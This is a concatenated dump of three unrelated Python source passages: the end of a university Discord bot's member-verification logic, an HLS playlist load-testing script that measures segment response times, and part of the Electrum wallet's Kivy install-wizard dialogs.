for c in "based":
emoji = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji)
await message.add_reaction("😎")
if message.author.id == ANI_NRUSIMHA_ID:
emoji = get(self.emojis, name="AniChamp")
if emoji:
await message.add_reaction(emoji)
else:
for c in 'ANI':
emoji_letter = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji_letter)
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, pleast type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(
f"{member} was sent registration email"
)
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
event loop in a separate thread. Event loops are one per-thread, and Django
can't handle async code, so a separate thread is used instead.
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running=True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
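# A minimal usage sketch from synchronous (e.g. Django) code, assuming this
# module is importable as `.bot`; the tag value is an illustrative placeholder:
#
#     from .bot import csua_bot
#     if csua_bot is not None:
#         verified = csua_bot.promote_user_to_hoser("someuser#1234")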
|
hls_runner.py
|
import json
import m3u8
from multiprocessing import Process, Manager, Lock
import pdb
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
import time
from urlparse import urlparse
def average_list(list_items, shift=1):
# Return average from list (normalised by shift to convert units)
try:
return float(sum(list_items))/float(len(list_items))/float(shift)
except ZeroDivisionError as e:
return None
def min_max_list(list_items, shift=1):
# Return list minimum and maximum (normalised by shift to convert units)
try:
return min(list_items)/float(shift), max(list_items)/float(shift)
except ValueError as e:
return None, None
def calculated_response_times(durations):
# Compile response times into Average, Min, and Max durations
return {
'Average': average_list(durations, 1000000),
'Min': min_max_list(durations, 1000000)[0],
'Max': min_max_list(durations, 1000000)[1]
}
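# Worked example: durations come from requests' elapsed.microseconds values,
# so the 1000000 shift converts them to seconds:
#
#     calculated_response_times([250000, 500000, 750000])
#     # -> {'Average': 0.5, 'Min': 0.25, 'Max': 0.75}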
def construct_url(playlist_url, segment):
# Segments point to absolute URL
if segment.startswith('http'):
return segment
# Segments point to relative URL, which need added path context
else:
if segment.startswith('./') and len(segment) > 2:
segment = segment[2:]
return playlist_url.rsplit('/', 1)[0] + ('/' + segment).replace('//', '/')
elif segment.startswith('/'):
return urlparse(playlist_url).scheme + '://' + (urlparse(playlist_url).netloc + segment).replace('//', '/')
else:
return playlist_url.rsplit('/', 1)[0] + '/' + segment
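# Resolution examples (doctest-style; host names are illustrative):
#
#     >>> construct_url('https://example.com/hls/live/playlist.m3u8', 'http://cdn.example.com/seg1.ts')
#     'http://cdn.example.com/seg1.ts'
#     >>> construct_url('https://example.com/hls/live/playlist.m3u8', './seg1.ts')
#     'https://example.com/hls/live/seg1.ts'
#     >>> construct_url('https://example.com/hls/live/playlist.m3u8', '/other/seg1.ts')
#     'https://example.com/other/seg1.ts'
#     >>> construct_url('https://example.com/hls/live/playlist.m3u8', 'seg1.ts')
#     'https://example.com/hls/live/seg1.ts'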
def get_playlist_details(m3u8_url, timeout, success):
# Get playlist and extract m3u8 data
try:
r = requests.get(m3u8_url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
        if r.status_code not in [200, 201, 302, 307]:
try: success[False] += 1
except: success[False] = 1
return
else:
try:
playlist = m3u8.loads(r.text)
try: success[True] += 1
except: success[True] = 1
return playlist
except:
try: success[False] += 1
except: success[False] = 1
return
except:
try: success[False] += 1
except: success[False] = 1
def get_segment(url, status, results, duration, timeout, lock):
# Get HLS Segment and tally status codes and errors
try:
r = requests.get(url=url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
duration.append(r.elapsed.microseconds)
lock.acquire()
try: status[r.status_code] += 1
except: status[r.status_code] = 1
lock.release()
lock.acquire()
try: results['Valid Response'] += 1
except: results['Valid Response'] = 1
lock.release()
except requests.exceptions.ReadTimeout as e:
lock.acquire()
try: results['Read Timeout'] += 1
except: results['Read Timeout'] = 1
lock.release()
except requests.exceptions.ConnectTimeout as e:
lock.acquire()
try: results['Connect Timeout'] += 1
except: results['Connect Timeout'] = 1
lock.release()
except requests.exceptions.ConnectionError as e:
lock.acquire()
try: results['Connection Error'] += 1
except: results['Connection Error'] = 1
lock.release()
except Exception as e:
print "Unknown Error %s" % e
lock.acquire()
try: results['Unknown Error'] += 1
except: results['Unknown Error'] = 1
lock.release()
def authenticate(authentication_url, username, password, request_type):
# Get session cookies for URLs requiring authentication
if request_type.lower() == 'get':
auth_request = requests.get(authentication_url, auth=(username, password))
elif request_type.lower() == 'post':
payload = {'username': username, 'password': password}
auth_request = requests.post(authentication_url, data=payload)
return auth_request.cookies
def get_playlist(m3u8_url, live, loop, results, status, success, duration, playlists, timeout, cookies, lock, pid):
# Extract HLS segments from M3U8 file for VOD or Live content
playlist = get_playlist_details(m3u8_url, timeout, success)
base_url = m3u8_url
if playlist:
loop_iterator, loop_limit = 1, 1000
seconds_since_new_file = 0
no_file_timeout = 120
segments = {}
segments['count'] = 0
segments['played'] = {}
# For live content
if live.lower() == 'true':
# If playlist contains nested playlists, use the first
if len(playlist.playlists) > 0:
base_url = construct_url(m3u8_url, playlist.playlists[0].uri)
while segments['count'] < int(loop):
# In case no files are found, break loop after 1000 iterations
loop_iterator += 1
if loop_iterator >= loop_limit:
return
# If playlists are continually requested with the same list of segments, timeout after no_file_timeout
if seconds_since_new_file > no_file_timeout:
return
playlist = get_playlist_details(base_url, timeout, success)
if not playlist:
continue
for idx, file in enumerate(playlist.files):
# Break when enough segments (user set) have been requested
if segments['count'] >= int(loop):
return
# Only request segments from [n - 3, n]
if idx < (len(playlist.files) - 3):
continue
segment_url = construct_url(base_url, file)
                    # If the segment has not yet been requested (some playlists will overlap TS files if requested too fast)
                    if segment_url not in segments['played']:
seconds_since_new_file = 0
lock.acquire()
segments['count'] += 1
lock.release()
segments['played'][segment_url] = True
time.sleep(timeout['sleep'])
get_segment(segment_url, status, results, duration, timeout, lock)
# Sleep before getting next playlists (in case there are no new segments, this loops too quickly)
time.sleep(timeout['sleep'])
seconds_since_new_file += int(timeout['sleep'])
else: # VOD
for loop_number in range(0, int(loop)):
# If playlist contains all TS files directly
if len(playlist.files) > 0:
for idx, file in enumerate(playlist.files):
time.sleep(timeout['sleep'])
segment_url = construct_url(base_url, file)
get_segment(segment_url, status, results, duration, timeout, lock)
# If playlist contains nested playlists
else:
for sub_playlist in playlist.playlists:
sub_playlist_url = construct_url(base_url, sub_playlist.uri)
nested_playlist = requests.get(url=sub_playlist_url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
for idx, file in enumerate(m3u8.loads(nested_playlist.text).files):
time.sleep(timeout['sleep'])
segment_url = construct_url(nested_playlist.url, file)
get_segment(segment_url, status, results, duration, timeout, lock)
def get_hls_stream(m3u8_url, concurrency=1, live=True, loop=1, segment_sleep=1, authentication=None, timeouts=None):
# Spawn concurrent subprocesses to get every HLS segment of stream
# Disable all SSL Warnings (version dependent)
try:
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
except:
pass
# Configurables
subprocesses = []
process_id = 0
timeout = {'read': float(timeouts['read']),
'connect': float(timeouts['connect']),
'sleep': float(segment_sleep)}
manager = Manager()
lock = manager.Lock()
durations = manager.list()
success = manager.dict()
results = manager.dict()
status = manager.dict()
playlists = manager.dict()
# Cookies for session authentication
if authentication:
cookies = (authentication['url'], authentication['username'], authentication['password'], authentication['type'])
else:
cookies = None
# Spawn parallel subprocesses for each simulated client
for x in range(0, int(concurrency)):
process_id += 1
p = Process(target=get_playlist, args=(m3u8_url, live, loop, results, status, success, durations, playlists, timeout, cookies, lock, process_id,))
subprocesses.append(p)
p.start()
# Wait for all processes to complete
for subprocess in subprocesses:
while True:
response_times = calculated_response_times(durations)
yield results._getvalue(), status._getvalue(), response_times, success._getvalue()
time.sleep(1)
if not subprocess.is_alive():
yield results._getvalue(), status._getvalue(), response_times, success._getvalue()
break
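# A minimal usage sketch (URL and numbers are illustrative). get_hls_stream is
# a generator that keeps yielding running totals while the worker processes
# are alive; note that `live` is compared as a string ('true'/'false'):
#
#     for results, status, times, success in get_hls_stream(
#             'https://example.com/hls/live/playlist.m3u8', concurrency=2,
#             live='true', loop=10, segment_sleep=1,
#             timeouts={'read': 5, 'connect': 5}):
#         print results, status, times, success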
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 = _("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
os.unlink(self.path)
self.wizard.terminate()
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete`: fired when the wizard is done creating or
restoring wallets.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target=target)
t.start()
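# Hedged usage sketch (not part of the original source): a caller would
# typically hand this a blocking callable plus a status message, e.g.
#   self.waiting_dialog(lambda: create_wallet(),        # hypothetical task
#                       _('Creating wallet...'),
#                       on_finished=lambda: None)
# `create_wallet` is a placeholder name, not an Electrum API.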
def terminate(self, *, storage=None):
if storage is None:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
